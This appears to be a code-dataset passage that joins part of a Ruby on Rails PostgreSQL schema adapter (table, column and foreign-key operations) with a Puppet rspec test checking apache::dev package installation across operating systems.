INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid
INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)
WHERE cons.contype = 'p'
AND dep.refobjid = '#{quote_table_name(table)}'::regclass
end_sql
pks.present? ? pks[0] : pks
end
# Renames a table.
# Also renames a table's primary key sequence if the sequence name exists and
# matches the Active Record default.
#
# Example:
# rename_table('octopuses', 'octopi')
def rename_table(table_name, new_name)
clear_cache!
execute "ALTER TABLE #{quote_table_name(table_name)} RENAME TO #{quote_table_name(new_name)}"
end
def add_column(table_name, column_name, type, options = {}) #:nodoc:
clear_cache!
super
end
# Changes the column of a table.
def change_column(table_name, column_name, type, options = {})
clear_cache!
quoted_table_name = quote_table_name(table_name)
sql_type = type_to_sql(type, limit: options[:limit], precision: options[:precision], scale: options[:scale])
sql = "ALTER TABLE #{quoted_table_name} ALTER COLUMN #{quote_column_name(column_name)} TYPE #{sql_type}"
sql << " USING #{options[:using]}" if options[:using]
if options[:cast_as]
sql << " USING CAST(#{quote_column_name(column_name)} AS #{type_to_sql(options[:cast_as], limit: options[:limit], precision: options[:precision], scale: options[:scale])})"
end
execute sql
change_column_default(table_name, column_name, options[:default]) if options_include_default?(options)
change_column_null(table_name, column_name, options[:null], options[:default]) if options.key?(:null)
end
# Changes the default value of a table column.
def change_column_default(table_name, column_name, default_or_changes)
clear_cache!
column = column_for(table_name, column_name)
return unless column
default = extract_new_default_value(default_or_changes)
alter_column_query = "ALTER TABLE #{quote_table_name(table_name)} ALTER COLUMN #{quote_column_name(column_name)} %s"
if default.nil?
# <tt>DEFAULT NULL</tt> results in the same behavior as <tt>DROP DEFAULT</tt>. However, PostgreSQL will
# cast the default to the columns type, which leaves us with a default like "default NULL::character varying".
execute alter_column_query % "DROP DEFAULT"
else
execute alter_column_query % "SET DEFAULT #{quote_default_value(default, column)}"
end
end
def change_column_null(table_name, column_name, null, default = nil)
clear_cache!
unless null || default.nil?
column = column_for(table_name, column_name)
execute("UPDATE #{quote_table_name(table_name)} SET #{quote_column_name(column_name)}=#{quote_default_value(default, column)} WHERE #{quote_column_name(column_name)} IS NULL") if column
end
execute("ALTER TABLE #{quote_table_name(table_name)} ALTER #{quote_column_name(column_name)} #{null ? 'DROP' : 'SET'} NOT NULL")
end
# Renames a column in a table.
def rename_column(table_name, column_name, new_column_name) #:nodoc:
clear_cache!
execute "ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}"
end
def add_index(table_name, column_name, options = {}) #:nodoc:
end
def remove_index!(table_name, index_name) #:nodoc:
end
def rename_index(table_name, old_name, new_name)
end
def foreign_keys(table_name)
fk_info = select_all(<<-SQL.strip_heredoc, 'SCHEMA')
SELECT t2.relname AS to_table, a1.attname AS column, a2.attname AS primary_key, c.conname AS name, c.confupdtype AS on_update, c.confdeltype AS on_delete
FROM pg_constraint c
JOIN pg_class t1 ON c.conrelid = t1.oid
JOIN pg_class t2 ON c.confrelid = t2.oid
JOIN pg_attribute a1 ON a1.attnum = c.conkey[1] AND a1.attrelid = t1.oid
JOIN pg_attribute a2 ON a2.attnum = c.confkey[1] AND a2.attrelid = t2.oid
JOIN pg_namespace t3 ON c.connamespace = t3.oid
WHERE c.contype = 'f'
AND t1.relname = #{quote(table_name)}
AND t3.nspname = ANY (current_schemas(false))
ORDER BY c.conname
SQL
fk_info.map do |row|
options = {
column: row['column'],
name: row['name'],
primary_key: row['primary_key']
}
options[:on_delete] = extract_foreign_key_action(row['on_delete'])
options[:on_update] = extract_foreign_key_action(row['on_update'])
ForeignKeyDefinition.new(table_name, row['to_table'], options)
end
end
def extract_foreign_key_action(specifier) # :nodoc:
case specifier
when 'c'; :cascade
when 'n'; :nullify
when 'r'; :restrict
end
end
def index_name_length
63
end
# Maps logical Rails types to PostgreSQL-specific data types.
def type_to_sql(type, limit: nil, precision: nil, scale: nil, **)
case type.to_s
when 'integer'
return 'integer' unless limit
case limit
when 1, 2; 'smallint'
when nil, 3, 4; 'integer'
when 5..8; 'bigint'
else raise(ActiveRecordError, "No integer type has byte size #{limit}. Use a numeric with precision 0 instead.")
end
else
super
end
end
# PostgreSQL requires the ORDER BY columns in the select list for distinct queries, and
# requires that the ORDER BY include the distinct column.
def columns_for_distinct(columns, orders) #:nodoc:
order_columns = orders.reject(&:blank?).map{ |s|
# Convert Arel node to string
s = s.to_sql unless s.is_a?(String)
# Remove any ASC/DESC modifiers
s.gsub(/\s+(?:ASC|DESC)\b/i, '')
.gsub(/\s+NULLS\s+(?:FIRST|LAST)\b/i, '')
}.reject(&:blank?).map.with_index { |column, i| "#{column} AS alias_#{i}" }
[super, *order_columns].join(', ')
end
def fetch_type_metadata(column_name, sql_type, oid, fmod)
cast_type = get_oid_type(oid.to_i, fmod.to_i, column_name, sql_type)
simple_type = SqlTypeMetadata.new(
sql_type: sql_type,
type: cast_type.type,
limit: cast_type.limit,
precision: cast_type.precision,
scale: cast_type.scale,
)
TypeMetadata.new(simple_type, oid: oid, fmod: fmod)
end
end
end
end
end
| 39.342857 | 197 | 0.599129 |
e2e0b47af866de5e2950340381b54acaad0be396 | 2,182 | require 'spec_helper'
describe 'apache::dev', :type => :class do
context "on a Debian OS" do
let :facts do
{
:lsbdistcodename => 'squeeze',
:osfamily => 'Debian',
:operatingsystem => 'Debian',
:operatingsystemrelease => '6',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_package("libaprutil1-dev") }
it { is_expected.to contain_package("libapr1-dev") }
it { is_expected.to contain_package("apache2-prefork-dev") }
end
context "on an Ubuntu 14 OS" do
let :facts do
{
:lsbdistrelease => '14.04',
:lsbdistcodename => 'trusty',
:osfamily => 'Debian',
:operatingsystem => 'Ubuntu',
:operatingsystemrelease => '14.04',
:is_pe => false,
}
end
it { is_expected.to contain_package("apache2-dev") }
end
context "on a RedHat OS" do
let :facts do
{
:osfamily => 'RedHat',
:operatingsystem => 'RedHat',
:operatingsystemrelease => '6',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_package("httpd-devel") }
end
context "on a FreeBSD OS" do
let :pre_condition do
'include apache::package'
end
let :facts do
{
:osfamily => 'FreeBSD',
:operatingsystem => 'FreeBSD',
:operatingsystemrelease => '9',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
end
context "on a Gentoo OS" do
let :pre_condition do
'include apache::package'
end
let :facts do
{
:osfamily => 'Gentoo',
:operatingsystem => 'Gentoo',
:operatingsystemrelease => '3.16.1-gentoo',
:concat_basedir => '/dne',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
end
end
| 29.486486 | 64 | 0.512374 |